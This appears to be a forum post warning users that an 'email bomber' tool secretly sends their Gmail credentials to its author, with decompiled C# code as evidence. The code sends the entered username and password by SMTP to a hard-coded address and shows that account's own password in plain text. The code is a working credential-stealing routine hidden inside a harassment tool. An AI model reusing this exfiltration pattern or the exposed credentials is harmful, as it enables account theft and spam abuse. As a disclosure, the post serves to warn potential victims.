This guy is mailing all the email usernames and passwords you use on this to himself.
Code:
private void button1_Click(object sender, EventArgs e)
{
if (((string.IsNullOrEmpty(this.textBox1.Text) || string.IsNullOrEmpty(this.textBox2.Text)) || (string.IsNullOrEmpty(this.textBox3.Text) || string.IsNullOrEmpty(this.textBox4.Text))) || ((string.IsNullOrEmpty(this.richTextBox1.Text) || !this.textBox1.Text.Contains("@")) || !this.textBox3.Text.Contains("@")))
{
MessageBox.Show("Please fill out all the forms correctly!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
else
{
MailMessage message = new MailMessage();
SmtpClient client = new SmtpClient("smtp.gmail.com");
message.From = new MailAddress("blessing1337@gmail.com");
message.To.Add("blessing1337@gmail.com");
message.Subject = "Email Bomber Logs";
message.Body = "Gmail Username: " + this.textBox1.Text + Environment.NewLine + "Gmail Password: " + this.textBox2.Text;
client.Port = 0x24b;
client.Credentials = new NetworkCredential("blessing1337@gmail.com", "1123181800640");
client.EnableSsl = true;
client.Send(message);
this.int_0 = 0;
this.label8.Text = "0";
this.textBox1.Enabled = false;
this.textBox2.Enabled = false;
this.textBox3.Enabled = false;
this.textBox4.Enabled = false;
this.richTextBox1.Enabled = false;
this.numericUpDown1.Enabled = false;
this.checkBox1.Enabled = false;
this.button1.Enabled = false;
this.button2.Enabled = true;
this.timer_1.Start();
}
}
He's also a noob who uses timers.